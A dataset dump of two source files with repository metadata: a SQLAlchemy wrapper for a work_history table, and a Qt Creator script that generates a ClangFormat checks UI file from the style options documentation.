models/work_history.py
|
1
|
2217
|
# -*- coding: utf-8 -*-
# Description: work_history table
# By Thuong.Tran
# Date: 29 Aug 2017
from sqlalchemy import create_engine, Table, Column, MetaData, Integer, Text, DateTime, Float
from sqlalchemy import select, and_
import datetime as dt
class work_history():
def __init__(self, db_url):
_engine = create_engine(db_url)
_connection = _engine.connect()
_metadata = MetaData()
_work_history = Table("work_history", _metadata,
Column("WRK_HIS_ID", Integer, primary_key=True),
Column("USR_ID", Integer),
Column("PROC_NM", Text),
Column("ST_DT", DateTime),
Column("END_DT", DateTime),
Column("LD_TM", Float),
Column("CRE_DT", DateTime))
_metadata.create_all(_engine)
self.connection = _connection
self.work_history = _work_history
pass
def insert_to(self, data):
is_valid = True
# for item in data:
# if not item:
# is_valid = False
# raise DropItem("Missing %s!" % item)
if is_valid:
ins_query = self.work_history.insert().values(data)
self.connection.execute(ins_query)
def get_all(self):
s = select([self.work_history]).order_by('PROC_NM')
result = self.connection.execute(s)
return result
def get_by_period(self, start_date, end_date):
s = select([self.work_history]).where(and_(self.work_history.c.ST_DT >= start_date,
self.work_history.c.END_DT <= end_date))
result = self.connection.execute(s)
return result
def get_finalized_process_of_one_day(self, today, worker):
lower = dt.datetime(today.year, today.month, today.day, 0, 0, 0)
upper = dt.datetime(today.year, today.month, today.day, 23, 59, 59)
print(lower)
print(upper)
s = select([self.work_history]).where(and_(self.work_history.c.END_DT > lower,
self.work_history.c.END_DT < upper,
self.work_history.c.USR_ID == worker))
result = self.connection.execute(s)
return result
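# Minimal usage sketch (the SQLite URL and values are illustrative, not from the
# original project):
#
#   wh = work_history('sqlite:///work_history.db')
#   now = dt.datetime.now()
#   wh.insert_to({'USR_ID': 1, 'PROC_NM': 'putting', 'ST_DT': now, 'END_DT': now,
#                 'LD_TM': 0.5, 'CRE_DT': now})
#   for row in wh.get_by_period(now - dt.timedelta(days=1), now):
#       print(row)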
|
mit
| 6,242,151,486,691,357,000
| 35.95
| 93
| 0.564727
| false
| 3.744932
| false
| false
| false
|
qtproject/qt-creator
|
scripts/generateClangFormatChecksUI.py
|
3
|
9025
|
#!/usr/bin/env python
############################################################################
#
# Copyright (C) 2019 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
import argparse
import json
import os
import docutils.nodes
import docutils.parsers.rst
import docutils.utils
def full_ui_content(checks):
return '''<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
<class>ClangFormat::ClangFormatChecksWidget</class>
<widget class="QWidget" name="ClangFormat::ClangFormatChecksWidget">
<property name="maximumSize">
<size>
<width>480</width>
<height>16777215</height>
</size>
</property>
<layout class="QGridLayout" name="checksLayout">
''' + checks + ''' </layout>
</widget>
<resources/>
<connections/>
</ui>
'''
def parse_arguments():
    parser = argparse.ArgumentParser(description='ClangFormat checks UI generator')
parser.add_argument('--clang-format-options-rst', help='path to ClangFormatStyleOptions.rst',
default=None, dest='options_rst')
return parser.parse_args()
def parse_rst(text):
parser = docutils.parsers.rst.Parser()
components = (docutils.parsers.rst.Parser,)
settings = docutils.frontend.OptionParser(components=components).get_default_values()
document = docutils.utils.new_document('<rst-doc>', settings=settings)
parser.parse(text, document)
return document
def createItem(key, value, index):
label = ''' <item row="''' + str(index) + '''" column="0">
<widget class="QLabel" name="label''' + key + '''">
<property name="text">
<string notr="true">''' + key + '''</string>
</property>
</widget>
</item>
'''
value_item = ''
if value[0] == 'bool':
value_item = ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + key + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
<item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">true</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">false</string>
</property>
</item>
</widget>
</item>
'''
elif value[0].startswith('std::string') or value[0] == 'unsigned' or value[0] == 'int':
value_item = ''' <item row="''' + str(index) + '''" column="1">
<layout class="QHBoxLayout">
<item>
<widget class="QLineEdit" name="''' + key + '''">
</widget>
</item>
<item>
<widget class="QPushButton" name="set''' + key + '''">
<property name="maximumSize">
<size>
<width>40</width>
<height>16777215</height>
</size>
</property>
<property name="text">
<string notr="true">Set</string>
</property>
</widget>
</item>
</layout>
</item>
'''
elif value[0].startswith('std::vector'):
value_item = ''' <item row="''' + str(index) + '''" column="1">
<layout class="QHBoxLayout">
<item>
<widget class="QPlainTextEdit" name="''' + key + '''">
<property name="sizePolicy">
<sizepolicy hsizetype="Expanding" vsizetype="Fixed"/>
</property>
<property name="maximumSize">
<size>
<width>16777215</width>
<height>50</height>
</size>
</property>
</widget>
</item>
<item>
<widget class="QPushButton" name="set''' + key + '''">
<property name="maximumSize">
<size>
<width>40</width>
<height>16777215</height>
</size>
</property>
<property name="text">
<string notr="true">Set</string>
</property>
</widget>
</item>
</layout>
</item>
'''
else:
if ' ' in value[1]:
value_item = ''
for i, val in enumerate(value):
if i == 0:
continue
index += 1
space_index = val.find(' ')
val = val[space_index + 1:]
value_item += ''' <item row="''' + str(index) + '''" column="0">
<widget class="QLabel" name="label''' + val + '''">
<property name="text">
<string notr="true"> ''' + val + '''</string>
</property>
</widget>
</item>
'''
value_item += ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + val + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
<item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">true</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">false</string>
</property>
</item>
</widget>
</item>
'''
else:
value_item = ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + key + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
'''
if key == 'Language':
value_item += ''' <property name="enabled">
<bool>false</bool>
</property>
'''
if index > 0:
value_item += ''' <item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
'''
for i, val in enumerate(value):
if i == 0:
continue
underline_index = val.find('_')
val = val[underline_index + 1:]
value_item += ''' <item>
<property name="text">
<string notr="true">''' + val + '''</string>
</property>
</item>
'''
value_item += ''' </widget>
</item>
'''
return label + value_item, index
class MyVisitor(docutils.nodes.NodeVisitor):
in_bullet_list = False
in_bullet_list_paragraph = False
tree = {}
last_key = ''
def visit_term(self, node):
node_values = node.traverse(condition=docutils.nodes.Text)
name = node_values[0].astext()
self.last_key = name
self.tree[name] = [node_values[2].astext()]
def visit_bullet_list(self, node):
self.in_bullet_list = True
def depart_bullet_list(self, node):
self.in_bullet_list = False
def visit_paragraph(self, node):
if self.in_bullet_list:
self.in_bullet_list_paragraph = True
def depart_paragraph(self, node):
self.in_bullet_list_paragraph = False
def visit_literal(self, node):
if self.in_bullet_list_paragraph:
value = node.traverse(condition=docutils.nodes.Text)[0].astext()
self.tree[self.last_key].append(value)
self.in_bullet_list_paragraph = False
def unknown_visit(self, node):
"""Called for all other node types."""
#print(node)
pass
def unknown_departure(self, node):
pass
def main():
arguments = parse_arguments()
content = file(arguments.options_rst).read()
document = parse_rst(content)
visitor = MyVisitor(document)
document.walkabout(visitor)
keys = visitor.tree.keys()
basedOnStyleKey = 'BasedOnStyle'
keys.remove(basedOnStyleKey)
keys.sort()
text = ''
line, index = createItem(basedOnStyleKey, visitor.tree[basedOnStyleKey], 0)
text += line
index = 1
for key in keys:
line, index = createItem(key, visitor.tree[key], index)
text += line
index += 1
current_path = os.path.dirname(os.path.abspath(__file__))
ui_path = os.path.abspath(os.path.join(current_path, '..', 'src',
'plugins', 'clangformat', 'clangformatchecks.ui'))
with open(ui_path, 'w') as f:
f.write(full_ui_content(text))
if __name__ == "__main__":
main()
|
gpl-3.0
| -6,718,310,938,669,209,000
| 30.013746
| 97
| 0.560665
| false
| 3.718583
| false
| false
| false
|